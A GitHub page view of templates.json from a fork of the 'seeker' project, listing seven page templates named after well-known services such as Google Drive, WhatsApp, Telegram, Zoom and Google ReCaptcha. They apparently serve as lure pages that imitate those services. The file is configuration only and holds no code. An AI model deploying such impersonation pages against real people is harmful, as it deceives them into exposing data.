forked from thewhiteh4t/seeker
-
Notifications
You must be signed in to change notification settings - Fork 0
/
templates.json
46 lines (46 loc) · 1.12 KB
/
templates.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
{
"templates": [
{
"name": "NearYou",
"dir_name": "nearyou",
"module": false,
"import_file": null
},
{
"name": "Google Drive",
"dir_name": "gdrive",
"module": true,
"import_file": "mod_gdrive"
},
{
"name": "WhatsApp",
"dir_name": "whatsapp",
"module": true,
"import_file": "mod_whatsapp"
},
{
"name": "WhatsApp Redirect",
"dir_name": "whatsapp_redirect",
"module": true,
"import_file": "mod_whatsapp_redirect"
},
{
"name": "Telegram",
"dir_name": "telegram",
"module": true,
"import_file": "mod_telegram"
},
{
"name": "Zoom",
"dir_name": "zoom",
"module": false,
"import_file": null
},
{
"name": "Google ReCaptcha",
"dir_name": "captcha",
"module": true,
"import_file": "mod_captcha"
}
]
}